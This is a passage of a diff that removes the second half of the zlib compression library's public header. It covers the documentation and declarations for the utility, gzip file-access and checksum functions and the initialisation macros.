-                                  int level));
-/*
-     Compresses the source buffer into the destination buffer.  The level
-   parameter has the same meaning as in deflateInit.  sourceLen is the byte
-   length of the source buffer.  Upon entry, destLen is the total size of the
-   destination buffer, which must be at least the value returned by
-   compressBound(sourceLen).  Upon exit, destLen is the actual size of the
-   compressed data.
-
-     compress2 returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_BUF_ERROR if there was not enough room in the output buffer,
-   Z_STREAM_ERROR if the level parameter is invalid.
-*/
-
-ZEXTERN uLong ZEXPORT compressBound OF((uLong sourceLen));
-/*
-     compressBound() returns an upper bound on the compressed size after
-   compress() or compress2() on sourceLen bytes.  It would be used before a
-   compress() or compress2() call to allocate the destination buffer.
-*/
-
-ZEXTERN int ZEXPORT uncompress OF((Bytef *dest,   uLongf *destLen,
-                                   const Bytef *source, uLong sourceLen));
-/*
-     Decompresses the source buffer into the destination buffer.  sourceLen is
-   the byte length of the source buffer.  Upon entry, destLen is the total size
-   of the destination buffer, which must be large enough to hold the entire
-   uncompressed data.  (The size of the uncompressed data must have been saved
-   previously by the compressor and transmitted to the decompressor by some
-   mechanism outside the scope of this compression library.) Upon exit, destLen
-   is the actual size of the uncompressed data.
-
-     uncompress returns Z_OK if success, Z_MEM_ERROR if there was not
-   enough memory, Z_BUF_ERROR if there was not enough room in the output
-   buffer, or Z_DATA_ERROR if the input data was corrupted or incomplete.  In
-   the case where there is not enough room, uncompress() will fill the output
-   buffer with the uncompressed data up to that point.
-*/
-
-ZEXTERN int ZEXPORT uncompress2 OF((Bytef *dest,   uLongf *destLen,
-                                    const Bytef *source, uLong *sourceLen));
-/*
-     Same as uncompress, except that sourceLen is a pointer, where the
-   length of the source is *sourceLen.  On return, *sourceLen is the number of
-   source bytes consumed.
-*/
-
-                        /* gzip file access functions */
-
-/*
-     This library supports reading and writing files in gzip (.gz) format with
-   an interface similar to that of stdio, using the functions that start with
-   "gz".  The gzip format is different from the zlib format.  gzip is a gzip
-   wrapper, documented in RFC 1952, wrapped around a deflate stream.
-*/
-
-typedef struct gzFile_s *gzFile;    /* semi-opaque gzip file descriptor */
-
-/*
-ZEXTERN gzFile ZEXPORT gzopen OF((const char *path, const char *mode));
-
-     Opens a gzip (.gz) file for reading or writing.  The mode parameter is as
-   in fopen ("rb" or "wb") but can also include a compression level ("wb9") or
-   a strategy: 'f' for filtered data as in "wb6f", 'h' for Huffman-only
-   compression as in "wb1h", 'R' for run-length encoding as in "wb1R", or 'F'
-   for fixed code compression as in "wb9F".  (See the description of
-   deflateInit2 for more information about the strategy parameter.)  'T' will
-   request transparent writing or appending with no compression and not using
-   the gzip format.
-
-     "a" can be used instead of "w" to request that the gzip stream that will
-   be written be appended to the file.  "+" will result in an error, since
-   reading and writing to the same gzip file is not supported.  The addition of
-   "x" when writing will create the file exclusively, which fails if the file
-   already exists.  On systems that support it, the addition of "e" when
-   reading or writing will set the flag to close the file on an execve() call.
-
-     These functions, as well as gzip, will read and decode a sequence of gzip
-   streams in a file.  The append function of gzopen() can be used to create
-   such a file.  (Also see gzflush() for another way to do this.)  When
-   appending, gzopen does not test whether the file begins with a gzip stream,
-   nor does it look for the end of the gzip streams to begin appending.  gzopen
-   will simply append a gzip stream to the existing file.
-
-     gzopen can be used to read a file which is not in gzip format; in this
-   case gzread will directly read from the file without decompression.  When
-   reading, this will be detected automatically by looking for the magic two-
-   byte gzip header.
-
-     gzopen returns NULL if the file could not be opened, if there was
-   insufficient memory to allocate the gzFile state, or if an invalid mode was
-   specified (an 'r', 'w', or 'a' was not provided, or '+' was provided).
-   errno can be checked to determine if the reason gzopen failed was that the
-   file could not be opened.
-*/
-
-ZEXTERN gzFile ZEXPORT gzdopen OF((int fd, const char *mode));
-/*
-     gzdopen associates a gzFile with the file descriptor fd.  File descriptors
-   are obtained from calls like open, dup, creat, pipe or fileno (if the file
-   has been previously opened with fopen).  The mode parameter is as in gzopen.
-
-     The next call of gzclose on the returned gzFile will also close the file
-   descriptor fd, just like fclose(fdopen(fd, mode)) closes the file descriptor
-   fd.  If you want to keep fd open, use fd = dup(fd_keep); gz = gzdopen(fd,
-   mode);.  The duplicated descriptor should be saved to avoid a leak, since
-   gzdopen does not close fd if it fails.  If you are using fileno() to get the
-   file descriptor from a FILE *, then you will have to use dup() to avoid
-   double-close()ing the file descriptor.  Both gzclose() and fclose() will
-   close the associated file descriptor, so they need to have different file
-   descriptors.
-
-     gzdopen returns NULL if there was insufficient memory to allocate the
-   gzFile state, if an invalid mode was specified (an 'r', 'w', or 'a' was not
-   provided, or '+' was provided), or if fd is -1.  The file descriptor is not
-   used until the next gz* read, write, seek, or close operation, so gzdopen
-   will not detect if fd is invalid (unless fd is -1).
-*/
-
-ZEXTERN int ZEXPORT gzbuffer OF((gzFile file, unsigned size));
-/*
-     Set the internal buffer size used by this library's functions.  The
-   default buffer size is 8192 bytes.  This function must be called after
-   gzopen() or gzdopen(), and before any other calls that read or write the
-   file.  The buffer memory allocation is always deferred to the first read or
-   write.  Three times that size in buffer space is allocated.  A larger buffer
-   size of, for example, 64K or 128K bytes will noticeably increase the speed
-   of decompression (reading).
-
-     The new buffer size also affects the maximum length for gzprintf().
-
-     gzbuffer() returns 0 on success, or -1 on failure, such as being called
-   too late.
-*/
-
-ZEXTERN int ZEXPORT gzsetparams OF((gzFile file, int level, int strategy));
-/*
-     Dynamically update the compression level or strategy.  See the description
-   of deflateInit2 for the meaning of these parameters.  Previously provided
-   data is flushed before the parameter change.
-
-     gzsetparams returns Z_OK if success, Z_STREAM_ERROR if the file was not
-   opened for writing, Z_ERRNO if there is an error writing the flushed data,
-   or Z_MEM_ERROR if there is a memory allocation error.
-*/
-
-ZEXTERN int ZEXPORT gzread OF((gzFile file, voidp buf, unsigned len));
-/*
-     Reads the given number of uncompressed bytes from the compressed file.  If
-   the input file is not in gzip format, gzread copies the given number of
-   bytes into the buffer directly from the file.
-
-     After reaching the end of a gzip stream in the input, gzread will continue
-   to read, looking for another gzip stream.  Any number of gzip streams may be
-   concatenated in the input file, and will all be decompressed by gzread().
-   If something other than a gzip stream is encountered after a gzip stream,
-   that remaining trailing garbage is ignored (and no error is returned).
-
-     gzread can be used to read a gzip file that is being concurrently written.
-   Upon reaching the end of the input, gzread will return with the available
-   data.  If the error code returned by gzerror is Z_OK or Z_BUF_ERROR, then
-   gzclearerr can be used to clear the end of file indicator in order to permit
-   gzread to be tried again.  Z_OK indicates that a gzip stream was completed
-   on the last gzread.  Z_BUF_ERROR indicates that the input file ended in the
-   middle of a gzip stream.  Note that gzread does not return -1 in the event
-   of an incomplete gzip stream.  This error is deferred until gzclose(), which
-   will return Z_BUF_ERROR if the last gzread ended in the middle of a gzip
-   stream.  Alternatively, gzerror can be used before gzclose to detect this
-   case.
-
-     gzread returns the number of uncompressed bytes actually read, less than
-   len for end of file, or -1 for error.  If len is too large to fit in an int,
-   then nothing is read, -1 is returned, and the error state is set to
-   Z_STREAM_ERROR.
-*/
-
-ZEXTERN z_size_t ZEXPORT gzfread OF((voidp buf, z_size_t size, z_size_t nitems,
-                                     gzFile file));
-/*
-     Read up to nitems items of size size from file to buf, otherwise operating
-   as gzread() does.  This duplicates the interface of stdio's fread(), with
-   size_t request and return types.  If the library defines size_t, then
-   z_size_t is identical to size_t.  If not, then z_size_t is an unsigned
-   integer type that can contain a pointer.
-
-     gzfread() returns the number of full items read of size size, or zero if
-   the end of the file was reached and a full item could not be read, or if
-   there was an error.  gzerror() must be consulted if zero is returned in
-   order to determine if there was an error.  If the multiplication of size and
-   nitems overflows, i.e. the product does not fit in a z_size_t, then nothing
-   is read, zero is returned, and the error state is set to Z_STREAM_ERROR.
-
-     In the event that the end of file is reached and only a partial item is
-   available at the end, i.e. the remaining uncompressed data length is not a
-   multiple of size, then the final partial item is nevetheless read into buf
-   and the end-of-file flag is set.  The length of the partial item read is not
-   provided, but could be inferred from the result of gztell().  This behavior
-   is the same as the behavior of fread() implementations in common libraries,
-   but it prevents the direct use of gzfread() to read a concurrently written
-   file, reseting and retrying on end-of-file, when size is not 1.
-*/
-
-ZEXTERN int ZEXPORT gzwrite OF((gzFile file,
-                                voidpc buf, unsigned len));
-/*
-     Writes the given number of uncompressed bytes into the compressed file.
-   gzwrite returns the number of uncompressed bytes written or 0 in case of
-   error.
-*/
-
-ZEXTERN z_size_t ZEXPORT gzfwrite OF((voidpc buf, z_size_t size,
-                                      z_size_t nitems, gzFile file));
-/*
-     gzfwrite() writes nitems items of size size from buf to file, duplicating
-   the interface of stdio's fwrite(), with size_t request and return types.  If
-   the library defines size_t, then z_size_t is identical to size_t.  If not,
-   then z_size_t is an unsigned integer type that can contain a pointer.
-
-     gzfwrite() returns the number of full items written of size size, or zero
-   if there was an error.  If the multiplication of size and nitems overflows,
-   i.e. the product does not fit in a z_size_t, then nothing is written, zero
-   is returned, and the error state is set to Z_STREAM_ERROR.
-*/
-
-ZEXTERN int ZEXPORTVA gzprintf Z_ARG((gzFile file, const char *format, ...));
-/*
-     Converts, formats, and writes the arguments to the compressed file under
-   control of the format string, as in fprintf.  gzprintf returns the number of
-   uncompressed bytes actually written, or a negative zlib error code in case
-   of error.  The number of uncompressed bytes written is limited to 8191, or
-   one less than the buffer size given to gzbuffer().  The caller should assure
-   that this limit is not exceeded.  If it is exceeded, then gzprintf() will
-   return an error (0) with nothing written.  In this case, there may also be a
-   buffer overflow with unpredictable consequences, which is possible only if
-   zlib was compiled with the insecure functions sprintf() or vsprintf()
-   because the secure snprintf() or vsnprintf() functions were not available.
-   This can be determined using zlibCompileFlags().
-*/
-
-ZEXTERN int ZEXPORT gzputs OF((gzFile file, const char *s));
-/*
-     Writes the given null-terminated string to the compressed file, excluding
-   the terminating null character.
-
-     gzputs returns the number of characters written, or -1 in case of error.
-*/
-
-ZEXTERN char * ZEXPORT gzgets OF((gzFile file, char *buf, int len));
-/*
-     Reads bytes from the compressed file until len-1 characters are read, or a
-   newline character is read and transferred to buf, or an end-of-file
-   condition is encountered.  If any characters are read or if len == 1, the
-   string is terminated with a null character.  If no characters are read due
-   to an end-of-file or len < 1, then the buffer is left untouched.
-
-     gzgets returns buf which is a null-terminated string, or it returns NULL
-   for end-of-file or in case of error.  If there was an error, the contents at
-   buf are indeterminate.
-*/
-
-ZEXTERN int ZEXPORT gzputc OF((gzFile file, int c));
-/*
-     Writes c, converted to an unsigned char, into the compressed file.  gzputc
-   returns the value that was written, or -1 in case of error.
-*/
-
-ZEXTERN int ZEXPORT gzgetc OF((gzFile file));
-/*
-     Reads one byte from the compressed file.  gzgetc returns this byte or -1
-   in case of end of file or error.  This is implemented as a macro for speed.
-   As such, it does not do all of the checking the other functions do.  I.e.
-   it does not check to see if file is NULL, nor whether the structure file
-   points to has been clobbered or not.
-*/
-
-ZEXTERN int ZEXPORT gzungetc OF((int c, gzFile file));
-/*
-     Push one character back onto the stream to be read as the first character
-   on the next read.  At least one character of push-back is allowed.
-   gzungetc() returns the character pushed, or -1 on failure.  gzungetc() will
-   fail if c is -1, and may fail if a character has been pushed but not read
-   yet.  If gzungetc is used immediately after gzopen or gzdopen, at least the
-   output buffer size of pushed characters is allowed.  (See gzbuffer above.)
-   The pushed character will be discarded if the stream is repositioned with
-   gzseek() or gzrewind().
-*/
-
-ZEXTERN int ZEXPORT gzflush OF((gzFile file, int flush));
-/*
-     Flushes all pending output into the compressed file.  The parameter flush
-   is as in the deflate() function.  The return value is the zlib error number
-   (see function gzerror below).  gzflush is only permitted when writing.
-
-     If the flush parameter is Z_FINISH, the remaining data is written and the
-   gzip stream is completed in the output.  If gzwrite() is called again, a new
-   gzip stream will be started in the output.  gzread() is able to read such
-   concatenated gzip streams.
-
-     gzflush should be called only when strictly necessary because it will
-   degrade compression if called too often.
-*/
-
-/*
-ZEXTERN z_off_t ZEXPORT gzseek OF((gzFile file,
-                                   z_off_t offset, int whence));
-
-     Sets the starting position for the next gzread or gzwrite on the given
-   compressed file.  The offset represents a number of bytes in the
-   uncompressed data stream.  The whence parameter is defined as in lseek(2);
-   the value SEEK_END is not supported.
-
-     If the file is opened for reading, this function is emulated but can be
-   extremely slow.  If the file is opened for writing, only forward seeks are
-   supported; gzseek then compresses a sequence of zeroes up to the new
-   starting position.
-
-     gzseek returns the resulting offset location as measured in bytes from
-   the beginning of the uncompressed stream, or -1 in case of error, in
-   particular if the file is opened for writing and the new starting position
-   would be before the current position.
-*/
-
-ZEXTERN int ZEXPORT    gzrewind OF((gzFile file));
-/*
-     Rewinds the given file. This function is supported only for reading.
-
-     gzrewind(file) is equivalent to (int)gzseek(file, 0L, SEEK_SET)
-*/
-
-/*
-ZEXTERN z_off_t ZEXPORT    gztell OF((gzFile file));
-
-     Returns the starting position for the next gzread or gzwrite on the given
-   compressed file.  This position represents a number of bytes in the
-   uncompressed data stream, and is zero when starting, even if appending or
-   reading a gzip stream from the middle of a file using gzdopen().
-
-     gztell(file) is equivalent to gzseek(file, 0L, SEEK_CUR)
-*/
-
-/*
-ZEXTERN z_off_t ZEXPORT gzoffset OF((gzFile file));
-
-     Returns the current offset in the file being read or written.  This offset
-   includes the count of bytes that precede the gzip stream, for example when
-   appending or when using gzdopen() for reading.  When reading, the offset
-   does not include as yet unused buffered input.  This information can be used
-   for a progress indicator.  On error, gzoffset() returns -1.
-*/
-
-ZEXTERN int ZEXPORT gzeof OF((gzFile file));
-/*
-     Returns true (1) if the end-of-file indicator has been set while reading,
-   false (0) otherwise.  Note that the end-of-file indicator is set only if the
-   read tried to go past the end of the input, but came up short.  Therefore,
-   just like feof(), gzeof() may return false even if there is no more data to
-   read, in the event that the last read request was for the exact number of
-   bytes remaining in the input file.  This will happen if the input file size
-   is an exact multiple of the buffer size.
-
-     If gzeof() returns true, then the read functions will return no more data,
-   unless the end-of-file indicator is reset by gzclearerr() and the input file
-   has grown since the previous end of file was detected.
-*/
-
-ZEXTERN int ZEXPORT gzdirect OF((gzFile file));
-/*
-     Returns true (1) if file is being copied directly while reading, or false
-   (0) if file is a gzip stream being decompressed.
-
-     If the input file is empty, gzdirect() will return true, since the input
-   does not contain a gzip stream.
-
-     If gzdirect() is used immediately after gzopen() or gzdopen() it will
-   cause buffers to be allocated to allow reading the file to determine if it
-   is a gzip file.  Therefore if gzbuffer() is used, it should be called before
-   gzdirect().
-
-     When writing, gzdirect() returns true (1) if transparent writing was
-   requested ("wT" for the gzopen() mode), or false (0) otherwise.  (Note:
-   gzdirect() is not needed when writing.  Transparent writing must be
-   explicitly requested, so the application already knows the answer.  When
-   linking statically, using gzdirect() will include all of the zlib code for
-   gzip file reading and decompression, which may not be desired.)
-*/
-
-ZEXTERN int ZEXPORT    gzclose OF((gzFile file));
-/*
-     Flushes all pending output if necessary, closes the compressed file and
-   deallocates the (de)compression state.  Note that once file is closed, you
-   cannot call gzerror with file, since its structures have been deallocated.
-   gzclose must not be called more than once on the same file, just as free
-   must not be called more than once on the same allocation.
-
-     gzclose will return Z_STREAM_ERROR if file is not valid, Z_ERRNO on a
-   file operation error, Z_MEM_ERROR if out of memory, Z_BUF_ERROR if the
-   last read ended in the middle of a gzip stream, or Z_OK on success.
-*/
-
-ZEXTERN int ZEXPORT gzclose_r OF((gzFile file));
-ZEXTERN int ZEXPORT gzclose_w OF((gzFile file));
-/*
-     Same as gzclose(), but gzclose_r() is only for use when reading, and
-   gzclose_w() is only for use when writing or appending.  The advantage to
-   using these instead of gzclose() is that they avoid linking in zlib
-   compression or decompression code that is not used when only reading or only
-   writing respectively.  If gzclose() is used, then both compression and
-   decompression code will be included the application when linking to a static
-   zlib library.
-*/
-
-ZEXTERN const char * ZEXPORT gzerror OF((gzFile file, int *errnum));
-/*
-     Returns the error message for the last error which occurred on the given
-   compressed file.  errnum is set to zlib error number.  If an error occurred
-   in the file system and not in the compression library, errnum is set to
-   Z_ERRNO and the application may consult errno to get the exact error code.
-
-     The application must not modify the returned string.  Future calls to
-   this function may invalidate the previously returned string.  If file is
-   closed, then the string previously returned by gzerror will no longer be
-   available.
-
-     gzerror() should be used to distinguish errors from end-of-file for those
-   functions above that do not distinguish those cases in their return values.
-*/
-
-ZEXTERN void ZEXPORT gzclearerr OF((gzFile file));
-/*
-     Clears the error and end-of-file flags for file.  This is analogous to the
-   clearerr() function in stdio.  This is useful for continuing to read a gzip
-   file that is being written concurrently.
-*/
-
-#endif /* !Z_SOLO */
-
-                        /* checksum functions */
-
-/*
-     These functions are not related to compression but are exported
-   anyway because they might be useful in applications using the compression
-   library.
-*/
-
-ZEXTERN uLong ZEXPORT adler32 OF((uLong adler, const Bytef *buf, uInt len));
-/*
-     Update a running Adler-32 checksum with the bytes buf[0..len-1] and
-   return the updated checksum.  If buf is Z_NULL, this function returns the
-   required initial value for the checksum.
-
-     An Adler-32 checksum is almost as reliable as a CRC-32 but can be computed
-   much faster.
-
-   Usage example:
-
-     uLong adler = adler32(0L, Z_NULL, 0);
-
-     while (read_buffer(buffer, length) != EOF) {
-       adler = adler32(adler, buffer, length);
-     }
-     if (adler != original_adler) error();
-*/
-
-ZEXTERN uLong ZEXPORT adler32_z OF((uLong adler, const Bytef *buf,
-                                    z_size_t len));
-/*
-     Same as adler32(), but with a size_t length.
-*/
-
-/*
-ZEXTERN uLong ZEXPORT adler32_combine OF((uLong adler1, uLong adler2,
-                                          z_off_t len2));
-
-     Combine two Adler-32 checksums into one.  For two sequences of bytes, seq1
-   and seq2 with lengths len1 and len2, Adler-32 checksums were calculated for
-   each, adler1 and adler2.  adler32_combine() returns the Adler-32 checksum of
-   seq1 and seq2 concatenated, requiring only adler1, adler2, and len2.  Note
-   that the z_off_t type (like off_t) is a signed integer.  If len2 is
-   negative, the result has no meaning or utility.
-*/
-
-ZEXTERN uLong ZEXPORT crc32   OF((uLong crc, const Bytef *buf, uInt len));
-/*
-     Update a running CRC-32 with the bytes buf[0..len-1] and return the
-   updated CRC-32.  If buf is Z_NULL, this function returns the required
-   initial value for the crc.  Pre- and post-conditioning (one's complement) is
-   performed within this function so it shouldn't be done by the application.
-
-   Usage example:
-
-     uLong crc = crc32(0L, Z_NULL, 0);
-
-     while (read_buffer(buffer, length) != EOF) {
-       crc = crc32(crc, buffer, length);
-     }
-     if (crc != original_crc) error();
-*/
-
-ZEXTERN uLong ZEXPORT crc32_z OF((uLong adler, const Bytef *buf,
-                                  z_size_t len));
-/*
-     Same as crc32(), but with a size_t length.
-*/
-
-/*
-ZEXTERN uLong ZEXPORT crc32_combine OF((uLong crc1, uLong crc2, z_off_t len2));
-
-     Combine two CRC-32 check values into one.  For two sequences of bytes,
-   seq1 and seq2 with lengths len1 and len2, CRC-32 check values were
-   calculated for each, crc1 and crc2.  crc32_combine() returns the CRC-32
-   check value of seq1 and seq2 concatenated, requiring only crc1, crc2, and
-   len2.
-*/
-
-
-                        /* various hacks, don't look :) */
-
-/* deflateInit and inflateInit are macros to allow checking the zlib version
- * and the compiler's view of z_stream:
- */
-ZEXTERN int ZEXPORT deflateInit_ OF((z_streamp strm, int level,
-                                     const char *version, int stream_size));
-ZEXTERN int ZEXPORT inflateInit_ OF((z_streamp strm,
-                                     const char *version, int stream_size));
-ZEXTERN int ZEXPORT deflateInit2_ OF((z_streamp strm, int  level, int  method,
-                                      int windowBits, int memLevel,
-                                      int strategy, const char *version,
-                                      int stream_size));
-ZEXTERN int ZEXPORT inflateInit2_ OF((z_streamp strm, int  windowBits,
-                                      const char *version, int stream_size));
-ZEXTERN int ZEXPORT inflateBackInit_ OF((z_streamp strm, int windowBits,
-                                         unsigned char FAR *window,
-                                         const char *version,
-                                         int stream_size));
-#ifdef Z_PREFIX_SET
-#  define z_deflateInit(strm, level) \
-          deflateInit_((strm), (level), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define z_inflateInit(strm) \
-          inflateInit_((strm), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define z_deflateInit2(strm, level, method, windowBits, memLevel, strategy) \
-          deflateInit2_((strm),(level),(method),(windowBits),(memLevel),\
-                        (strategy), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define z_inflateInit2(strm, windowBits) \
-          inflateInit2_((strm), (windowBits), ZLIB_VERSION, \
-                        (int)sizeof(z_stream))
-#  define z_inflateBackInit(strm, windowBits, window) \
-          inflateBackInit_((strm), (windowBits), (window), \
-                           ZLIB_VERSION, (int)sizeof(z_stream))
-#else
-#  define deflateInit(strm, level) \
-          deflateInit_((strm), (level), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define inflateInit(strm) \
-          inflateInit_((strm), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define deflateInit2(strm, level, method, windowBits, memLevel, strategy) \
-          deflateInit2_((strm),(level),(method),(windowBits),(memLevel),\
-                        (strategy), ZLIB_VERSION, (int)sizeof(z_stream))
-#  define inflateInit2(strm, windowBits) \
-          inflateInit2_((strm), (windowBits), ZLIB_VERSION, \
-                        (int)sizeof(z_stream))
-#  define inflateBackInit(strm, windowBits, window) \
-          inflateBackInit_((strm), (windowBits), (window), \
-                           ZLIB_VERSION, (int)sizeof(z_stream))
-#endif
-
-#ifndef Z_SOLO
-
-/* gzgetc() macro and its supporting function and exposed data structure.  Note
- * that the real internal state is much larger than the exposed structure.
- * This abbreviated structure exposes just enough for the gzgetc() macro.  The
- * user should not mess with these exposed elements, since their names or
- * behavior could change in the future, perhaps even capriciously.  They can
- * only be used by the gzgetc() macro.  You have been warned.
- */
-struct gzFile_s {
-    unsigned have;
-    unsigned char *next;
-    z_off64_t pos;
-};
-ZEXTERN int ZEXPORT gzgetc_ OF((gzFile file));  /* backward compatibility */
-#ifdef Z_PREFIX_SET
-#  undef z_gzgetc
-#  define z_gzgetc(g) \
-          ((g)->have ? ((g)->have--, (g)->pos++, *((g)->next)++) : (gzgetc)(g))
-#else
-#  define gzgetc(g) \
-          ((g)->have ? ((g)->have--, (g)->pos++, *((g)->next)++) : (gzgetc)(g))
-#endif
-
-/* provide 64-bit offset functions if _LARGEFILE64_SOURCE defined, and/or
- * change the regular functions to 64 bits if _FILE_OFFSET_BITS is 64 (if
- * both are true, the application gets the *64 functions, and the regular
- * functions are changed to 64 bits) -- in case these are set on systems
- * without large file support, _LFS64_LARGEFILE must also be true
- */
-#ifdef Z_LARGE64
-   ZEXTERN gzFile ZEXPORT gzopen64 OF((const char *, const char *));
-   ZEXTERN z_off64_t ZEXPORT gzseek64 OF((gzFile, z_off64_t, int));
-   ZEXTERN z_off64_t ZEXPORT gztell64 OF((gzFile));
-   ZEXTERN z_off64_t ZEXPORT gzoffset64 OF((gzFile));
-   ZEXTERN uLong ZEXPORT adler32_combine64 OF((uLong, uLong, z_off64_t));
-   ZEXTERN uLong ZEXPORT crc32_combine64 OF((uLong, uLong, z_off64_t));
-#endif
-
-#if !defined(ZLIB_INTERNAL) && defined(Z_WANT64)
-#  ifdef Z_PREFIX_SET
-#    define z_gzopen z_gzopen64
-#    define z_gzseek z_gzseek64
-#    define z_gztell z_gztell64
-#    define z_gzoffset z_gzoffset64
-#    define z_adler32_combine z_adler32_combine64
-#    define z_crc32_combine z_crc32_combine64
-#  else
-#    define gzopen gzopen64
-#    define gzseek gzseek64
-#    define gztell gztell64
-#    define gzoffset gzoffset64
-#    define adler32_combine adler32_combine64
-#    define crc32_combine crc32_combine64
-#  endif
-#  ifndef Z_LARGE64
-     ZEXTERN gzFile ZEXPORT gzopen64 OF((const char *, const char *));
-     ZEXTERN z_off_t ZEXPORT gzseek64 OF((gzFile, z_off_t, int));
-     ZEXTERN z_off_t ZEXPORT gztell64 OF((gzFile));
-     ZEXTERN z_off_t ZEXPORT gzoffset64 OF((gzFile));
-     ZEXTERN uLong ZEXPORT adler32_combine64 OF((uLong, uLong, z_off_t));
-     ZEXTERN uLong ZEXPORT crc32_combine64 OF((uLong, uLong, z_off_t));
-#  endif
-#else
-   ZEXTERN gzFile ZEXPORT gzopen OF((const char *, const char *));
-   ZEXTERN z_off_t ZEXPORT gzseek OF((gzFile, z_off_t, int));
-   ZEXTERN z_off_t ZEXPORT gztell OF((gzFile));
-   ZEXTERN z_off_t ZEXPORT gzoffset OF((gzFile));
-   ZEXTERN uLong ZEXPORT adler32_combine OF((uLong, uLong, z_off_t));
-   ZEXTERN uLong ZEXPORT crc32_combine OF((uLong, uLong, z_off_t));
-#endif
-
-#else /* Z_SOLO */
-
-   ZEXTERN uLong ZEXPORT adler32_combine OF((uLong, uLong, z_off_t));
-   ZEXTERN uLong ZEXPORT crc32_combine OF((uLong, uLong, z_off_t));
-
-#endif /* !Z_SOLO */
-
-/* undocumented functions */
-ZEXTERN const char   * ZEXPORT zError           OF((int));
-ZEXTERN int            ZEXPORT inflateSyncPoint OF((z_streamp));
-ZEXTERN const z_crc_t FAR * ZEXPORT get_crc_table    OF((void));
-ZEXTERN int            ZEXPORT inflateUndermine OF((z_streamp, int));
-ZEXTERN int            ZEXPORT inflateValidate OF((z_streamp, int));
-ZEXTERN unsigned long  ZEXPORT inflateCodesUsed OF ((z_streamp));
-ZEXTERN int            ZEXPORT inflateResetKeep OF((z_streamp));
-ZEXTERN int            ZEXPORT deflateResetKeep OF((z_streamp));
-#if (defined(_WIN32) || defined(__CYGWIN__)) && !defined(Z_SOLO)
-ZEXTERN gzFile         ZEXPORT gzopen_w OF((const wchar_t *path,
-                                            const char *mode));
-#endif
-#if defined(STDC) || defined(Z_HAVE_STDARG_H)
-#  ifndef Z_SOLO
-ZEXTERN int            ZEXPORTVA gzvprintf Z_ARG((gzFile file,
-                                                  const char *format,
-                                                  va_list va));
-#  endif
-#endif
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif /* ZLIB_H */